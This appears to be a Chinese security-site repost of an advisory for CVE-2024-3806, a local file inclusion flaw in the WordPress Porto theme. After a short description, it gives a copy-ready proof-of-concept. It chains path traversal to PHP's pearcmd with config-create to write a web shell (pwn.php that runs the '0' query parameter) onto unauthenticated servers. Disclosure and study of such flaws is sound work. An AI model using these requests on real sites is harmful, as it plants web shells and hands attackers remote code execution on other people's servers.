CVE-2024-3806

admin 2024年5月12日16:48:10评论57 views字数 927阅读3分5秒阅读模式

使使使

影响描述

    WordPress的Porto主题在7.1.0之前(包括7.1.0)的所有版本中都容易通过“Porto_ajax_posts”功能被本地文件包含。这使得未经身份验证的攻击者有可能在服务器上包含并执行任意文件,从而允许执行这些文件中的任何PHP代码。这可以用来绕过访问控制,获取敏感数据,或者在php文件类型可以上传和包含的情况下实现代码执行。

差异函数porto_ajax_posts文件:incfunctionspost.php

poc&exp

Steps to Reproduce:Create post with slideshow_type value: ../../../../../../../../../usr/local/lib/php/pearcmdSend RequestNo login required to access: <Host>/wp-admin/admin-ajax.php?action=porto_ajax_posts&post_type=post&post_layout=full&+config-create+/&/<?=`$_GET[0]`?>+/var/www/html/pwn.phporNo login required to access: <Host>/wp-admin/admin-ajax.php?action=porto_ajax_posts&post_type=post&post_layout=full&+config-create+/&/<?=`$_GET[0]`?>+/var/www/html/pwn.php&nonce={{porto_nonce}}

CVE-2024-3806

CVE-2024-3806

原文始发于微信公众号(漏洞猎人):CVE-2024-3806

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月12日16:48:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-3806https://cn-sec.com/archives/2732393.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息